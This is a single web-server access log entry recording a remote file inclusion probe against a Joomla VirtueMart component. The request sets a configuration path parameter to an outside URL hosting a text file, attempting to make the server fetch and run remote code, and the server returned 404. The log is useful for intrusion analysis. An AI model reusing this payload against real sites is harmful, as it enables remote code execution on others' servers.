58.150.99.144 - - [05/Mar/2010:05:53:59 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
